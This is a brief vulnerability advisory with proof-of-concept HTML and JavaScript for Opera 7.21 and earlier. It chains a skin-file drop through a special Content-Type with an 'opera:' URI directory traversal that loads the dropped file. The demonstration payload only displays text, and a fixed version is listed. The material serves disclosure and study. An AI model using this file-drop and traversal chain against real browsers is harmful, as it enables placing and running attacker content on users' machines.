‘Opera Skinned and Opera Directory Traversal (Exploit)’

Details

‘Vulnerable systems:
 * Opera version 7.21 and prior

Immune systems:
 * Opera version 7.22

Exploit:
This is a simple proof of concept for the two Opera vulnerabilities detailed in the ‘Opera Skinned : Arbitrary File Dropping And Execution‘ and ‘Opera Web Browser Directory Traversal in Internal URI Protocol‘ advisories.

‘main.htm’ is the file which is to be loaded into the browser remotely. This file opens ‘skin.htm’ in a new window. The Content-Type of ‘skin.htm’ should be set as ‘application/x-opera-skin’ on the server. When skin.htm is opened in this way, it is dropped in the ‘/profile/skin/’ folder on the victim’s machine. This demonstrates the first vulnerability.

After dropping skin.htm, main.htm is redirected to the local skin.htm. The path of skin.htm is calculated using the second vulnerability. This demonstrates the second vulnerability.

NOTE: Don’t forget to set the Content-Type as ‘application/x-opera-skin’ for skin.htm.

—————START MAIN.HTM—————-
< html>
< head>
< script language=’javascript’>
var win=open(‘skin.htm’) // The server should return content-type as // ‘application/x-opera-skin’ for ‘Skin.htm’. ‘Skin.htm’ will be dropped in the ‘<opera // dir>/profile/skin/’ folder.
setTimeout(‘redir()’,2000) //modify according to your situation.
function redir(){
window.location.href=’opera:/help/..%5c/profile/skin/skin.htm’ //This uses the // directory traversal flaw mentioned in advisory 2 to get the path of the dropped file. In this // case, it is skin.htm.
}
</script>
</head>
< body>
< h1>This is the main file</h1>
</body>
</html>
—————END MAIN.HTM—————-

—————START SKIN.HTM—————-
< body>
< h1> Opera Skinned!!! </h1>< p>This is Skin.htm from ‘<opera dir>/profile/skin/’ in localhost.
</body>
—————END SKIN.HTM—————-‘